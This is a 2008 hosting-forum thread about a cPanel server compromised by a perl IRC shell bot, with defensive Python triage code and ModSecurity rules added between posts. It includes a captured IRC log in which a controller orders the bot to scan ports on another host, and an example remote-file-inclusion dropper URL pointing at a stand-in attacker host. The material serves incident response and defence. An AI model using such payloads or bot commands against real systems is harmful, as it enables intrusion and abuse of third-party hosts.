The Community Forums


From odd 'nobody' process to unusual and malicious IRC traffic

Discussion in 'General Discussion' started by jasonb3t, May 29, 2008.

  1. jasonb3t (Member, joined May 29, 2008)
    We discovered an odd process on our cPanel server, launched from /usr/sbin/sshd, but running under the name "perl" as the user "nobody." It was taking up a lot of CPU time.

    Doing an "lsof | grep <PID number>," I found it would periodically open lots of Apache logs, attempt to start listeners on ports 80 and 443, and launch an IRC connection out to quakenet2.blueyonder.net.

    I started up a packet sniffer to see what the IRC traffic was about and I got this conversation (abc!~nobody@edu.users.quakenet.org is evidently our box responding to queries as an IRC bot):
    Code:
    PING :blueyonder2.uk.quakenet.org
    PONG :blueyonder2.uk.quakenet.org
    :AnGeL!~antonio@casteel.org PRIVMSG #udp :!ssh 77.81.160.1 22
    :AnGeL!~antonio@casteel.org PRIVMSG #udp :!ssh 77.81.160.1 80
    :_secure!~damian@Damian.users.quakenet.org PRIVMSG #udp :!dns 77.81.160.1
    :abc!~nobody@edu.users.quakenet.org PRIVMSG #udp :.4Unable to resolve ..77.81.160.1. .
    :abc!~nobody@edu.users.quakenet.org PRIVMSG #udp :Conexiunea la 77.81.160.1 (22) e in TIME OUT.
    :abc!~nobody@edu.users.quakenet.org PRIVMSG #udp :Conexiunea la 77.81.160.1 (80) e in TIME OUT.
    :_secure!~damian@Damian.users.quakenet.org PRIVMSG #udp :.ACTION of.
    :_secure!~damian@Damian.users.quakenet.org PRIVMSG #udp :.ACTION @ somn.
    :AnGeL!~antonio@casteel.org PRIVMSG #udp :!ssh 77.81.160.1 53
    :abc!~nobody@edu.users.quakenet.org PRIVMSG #udp :Conexiunea la 77.81.160.1 (53) este acceptata!
    PING :blueyonder2.uk.quakenet.org
    PONG :blueyonder2.uk.quakenet.org
    PING :blueyonder2.uk.quakenet.org
    PONG :blueyonder2.uk.quakenet.org
    
    After seeing that traffic, we had enough and did a "kill -9" to get rid of the process.

    Now we're seeing a process that is supposedly part of cPanel trying to connect to a myriad of IRC servers:
    Code:
    # lsof -i | grep ircd
    chkservd   2327   nobody    0u  IPv4 935805051       TCP 172.16.0.10:52547->gw-vlan-264.drX-asd2.nl.euro.net:ircd (SYN_SENT)
    chkservd   2327   nobody    1u  IPv4 877984138       TCP ***ourIP***:47008->irc.rcn.com:ircd (ESTABLISHED)
    chkservd   2327   nobody    2u  IPv4 877708484       TCP ***ourIP***:44069->irc.rcn.com:ircd (ESTABLISHED)
    chkservd   2327   nobody  396u  IPv4 877852377       TCP ***ourIP***:45815->irc.rcn.com:ircd (ESTABLISHED)
    chkservd   2327   nobody  398u  IPv4 877704785       TCP ***ourIP***:43997->irc.rcn.com:ircd (ESTABLISHED)
    chkservd   2327   nobody  399u  IPv4 877719170       TCP ***another_of_ourIPs***:44211->irc.rcn.com:ircd (ESTABLISHED)
    chkservd   2327   nobody  400u  IPv4 877714142       TCP ***ourIP***:44119->irc.rcn.com:ircd (ESTABLISHED)
    chkservd   2327   nobody  401u  IPv4 877730070       TCP ***yet another_of_ourIPs***:44289->irc.rcn.com:ircd (ESTABLISHED)
    
    There are several IP addresses configured on the server and these connection attempts are actually being made from different ones--not just the default.

    I've run rootkit finders and some clamscans and I've come up with nothing. chkservd is not configured for any IRC services. Any ideas, gentlemen?
     
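The two artifacts in the post above, the `lsof -i` listing and the IRC capture, can be triaged mechanically. The script below is an added example, not code from the thread: it parses `lsof -i` lines to flag web-user (nobody) processes that talk to IRC or that borrow the name of a daemon that only ever runs as root (a nobody-owned "chkservd" is exactly that), and it parses the captured IRC traffic to separate the controller's orders from the bot's replies. The bot's Romanian replies read "connection to 77.81.160.1 (22) timed out" and "connection to 77.81.160.1 (53) is accepted", i.e. it is reporting port-scan results back to the channel. The sample lines are constructed from the post with real addresses replaced by RFC 5737 ranges and example.* hostnames; the IRC port list and the set of root-only daemons are assumptions to tune for your own server.

```python
"""Triage helpers for the lsof listing and IRC capture above (added example)."""
import re

# Constructed from the post's `lsof -i | grep ircd` output (addresses changed),
# plus one benign httpd line and one root sshd line for contrast.
LSOF_SAMPLE = """\
chkservd   2327   nobody    0u  IPv4 935805051       TCP 172.16.0.10:52547->gw.example.net:ircd (SYN_SENT)
chkservd   2327   nobody    1u  IPv4 877984138       TCP 198.51.100.10:47008->irc.example.com:ircd (ESTABLISHED)
chkservd   2327   nobody  396u  IPv4 877852377       TCP 198.51.100.10:45815->irc.example.com:ircd (ESTABLISHED)
chkservd   2327   nobody  399u  IPv4 877719170       TCP 198.51.100.11:44211->irc.example.com:6667 (ESTABLISHED)
httpd      1122   nobody    4u  IPv4 877700000       TCP 198.51.100.10:80->203.0.113.5:51000 (ESTABLISHED)
sshd        877     root    3u  IPv4 877600000       TCP 198.51.100.10:22->203.0.113.9:40111 (ESTABLISHED)
"""

# Constructed from the post's packet capture. \x03 is the mIRC colour prefix and
# \x01 wraps CTCP ACTION; both were rendered as "." in the post.
IRC_SAMPLE = (
    "PING :irc.example.net\n"
    "PONG :irc.example.net\n"
    ":AnGeL!~antonio@host.example.org PRIVMSG #udp :!ssh 192.0.2.1 22\n"
    ":AnGeL!~antonio@host.example.org PRIVMSG #udp :!ssh 192.0.2.1 80\n"
    ":_secure!~damian@Damian.users.example.net PRIVMSG #udp :!dns 192.0.2.1\n"
    ":abc!~nobody@edu.users.example.net PRIVMSG #udp :\x034Unable to resolve 192.0.2.1\n"
    ":abc!~nobody@edu.users.example.net PRIVMSG #udp :Conexiunea la 192.0.2.1 (22) e in TIME OUT.\n"
    ":abc!~nobody@edu.users.example.net PRIVMSG #udp :Conexiunea la 192.0.2.1 (53) este acceptata!\n"
    ":_secure!~damian@Damian.users.example.net PRIVMSG #udp :\x01ACTION @ somn\x01\n"
)

IRC_PORTS = set(range(6660, 6670)) | {6697, 7000}   # assumption: usual IRC ports
IRC_PORT_NAMES = {"ircd", "irc", "ircs"}            # names lsof prints from /etc/services
ROOT_ONLY_DAEMONS = {"chkservd", "sshd", "crond", "cpsrvd", "exim"}  # assumption

LSOF_RE = re.compile(
    r"^(?P<cmd>\S+)\s+(?P<pid>\d+)\s+(?P<user>\S+)\s+(?P<fd>\S+)\s+(?P<type>IPv[46])\s+"
    r".*?(?P<proto>TCP|UDP)\s+(?P<name>\S+)(?:\s+\((?P<state>[A-Z_]+)\))?\s*$"
)
IRC_PRIVMSG_RE = re.compile(
    r"^:(?P<nick>[^!\s]+)!(?P<ident>[^@\s]+)@(?P<host>\S+)\s+PRIVMSG\s+(?P<target>\S+)\s+:(?P<text>.*)$"
)
BOT_COMMAND_RE = re.compile(r"^[!.](?P<cmd>[A-Za-z]+)(?:\s+(?P<args>.*))?$")
COLOUR_RE = re.compile(r"\x03\d{0,2}(?:,\d{1,2})?")


def parse_lsof(text):
    """Turn `lsof -i` lines into dicts; header and unparseable lines are skipped."""
    records = []
    for line in text.splitlines():
        m = LSOF_RE.match(line)
        if not m:
            continue
        rec = m.groupdict()
        local, _, remote = rec.pop("name").partition("->")
        rec["local"], rec["remote"] = local, remote or None
        rec["pid"] = int(rec["pid"])
        records.append(rec)
    return records


def is_irc_port(port):
    """`port` is the text after the last ':' of an lsof endpoint: a name or a number."""
    return port in IRC_PORT_NAMES or (port.isdigit() and int(port) in IRC_PORTS)


def flag_processes(records, web_users=("nobody",)):
    """pid -> findings for web-user processes that connect to IRC or that carry
    the name of a daemon which only runs as root (name-mismatch)."""
    suspects = {}
    for r in records:
        if r["user"] not in web_users:
            continue
        reasons = set()
        if r["remote"] and is_irc_port(r["remote"].rpartition(":")[2]):
            reasons.add("irc")
        if r["cmd"] in ROOT_ONLY_DAEMONS:
            reasons.add("name-mismatch")
        if not reasons:
            continue
        s = suspects.setdefault(r["pid"], {"cmd": r["cmd"], "user": r["user"],
                                           "reasons": set(), "remotes": set()})
        s["reasons"] |= reasons
        if "irc" in reasons:
            s["remotes"].add(r["remote"])
    return suspects


def parse_irc(text, bot_ident="~nobody"):
    """Split channel traffic into (commands, replies): commands are channel
    messages shaped like "!ssh host port" (the controller's orders); replies
    are messages sent with the ident our bot used (~nobody in the capture)."""
    commands, replies = [], []
    for line in text.splitlines():
        m = IRC_PRIVMSG_RE.match(line)
        if not m:
            continue                      # PING/PONG, numerics, etc.
        msg = m.groupdict()
        if msg["text"].startswith("\x01"):
            continue                      # CTCP ACTION, not a command
        cmd = BOT_COMMAND_RE.match(msg["text"])
        if msg["target"].startswith("#") and cmd:
            commands.append((msg["nick"], cmd["cmd"].lower(), (cmd["args"] or "").split()))
        elif msg["ident"] == bot_ident:
            replies.append((msg["nick"], COLOUR_RE.sub("", msg["text"])))
    return commands, replies


def attacked_hosts(commands):
    """Hosts the controller pointed the bot at, with the commands used on each."""
    hosts = {}
    for _nick, cmd, args in commands:
        if args:
            hosts.setdefault(args[0], set()).add(cmd)
    return hosts


if __name__ == "__main__":
    for pid, s in flag_processes(parse_lsof(LSOF_SAMPLE)).items():
        print(f"pid {pid} ({s['cmd']} as {s['user']}): {sorted(s['reasons'])} -> {sorted(s['remotes'])}")
    commands, replies = parse_irc(IRC_SAMPLE)
    print("controller commands:", commands)
    print("bot replies:", replies)
    print("targets:", attacked_hosts(commands))
```

Run it against `lsof -i -n -P` output from the live box (numeric ports will then hit `IRC_PORTS` rather than the service names), and keep the pid list: before killing anything, capture `/proc/<pid>/exe`, `/proc/<pid>/cwd` and `/proc/<pid>/cmdline`, since a process that calls itself chkservd but whose exe link points into /tmp or a customer's web space is the dropped script you need to find and remove.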
  2. ramprage (Well-Known Member, joined Jul 21, 2002, Canada)
    This looks like a perl IRC bot, which usually gets uploaded to a user's web space and run remotely. Virus scanners won't pick that type of thing up since it's not a virus. Upload Guardian will.

    Also having Nobody Check installed is a good idea to keep an eye on your nobody/web user processes.
     
  3. IPSecureNetwork (Well-Known Member, joined May 28, 2005)
    Buddy, you are another victim of the Shell Bots kiddies.
    This may have happened because one of your customers has a vulnerable site with a remote file inclusion bug.

    One good idea is to activate mod_security or Snort inline to prevent these intrusions.

    If you are infected with these perl bots, your box will be available to be used like a gun against any target, shooting a lot of Gbps at someone.

    The use of a very good IDS, constantly updated, is one of the best practices, I think, to prevent this kind of trouble.

    Best Regards
     
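The reply above names mod_security as the control for the remote file inclusion path. As an added example (not from the thread, and not a complete rule set), here is a minimal ModSecurity 2.x fragment that blocks the classic RFI shape, a request parameter whose value is a remote URL or a PHP stream wrapper, which is how a dropper like `index.php?page=http://attacker/bot.txt` pulls a perl bot into the web user's space. The rule ids are arbitrary and the wrapper list is an assumption.

```apache
# Added example: ModSecurity 2.x rules against remote file inclusion.
<IfModule security2_module>
    SecRuleEngine On
    SecRequestBodyAccess On

    # Deny any GET/POST argument whose value starts with a remote URL scheme
    # or a PHP stream wrapper. t:urlDecodeUni runs before the regex so
    # %68ttp:// and http%3A%2F%2F are caught as well.
    SecRule ARGS "@rx (?i)^\s*(?:(?:https?|ftps?|php|expect|phar)://|data:)" "id:900100,phase:2,t:none,t:urlDecodeUni,deny,status:403,log,msg:'Possible remote file inclusion in %{MATCHED_VAR_NAME}'"

    # Log-only companion for the same pattern in the request line, so that
    # attempts against a vhost that has 900100 removed are still visible.
    SecRule REQUEST_URI "@rx (?i)=(?:https?|ftps?)://[^&]+" "id:900101,phase:1,t:none,t:urlDecodeUni,pass,log,msg:'URL-valued parameter in request line'"
</IfModule>
```

Rule 900100 will also block legitimate parameters that carry a URL (redirect targets, feed readers, link checkers); exempt those per vhost with `SecRuleRemoveById 900100` or narrow the target from `ARGS` to the specific argument names rather than loosening the pattern. It is a compensating control, not a fix: the customer's application still has to be patched, the dropped files removed, and the web user denied outbound IRC (for example an iptables OUTPUT rule matching `-m owner --uid-owner nobody` that rejects TCP 6660-6669), so a bot that does get in cannot reach its channel.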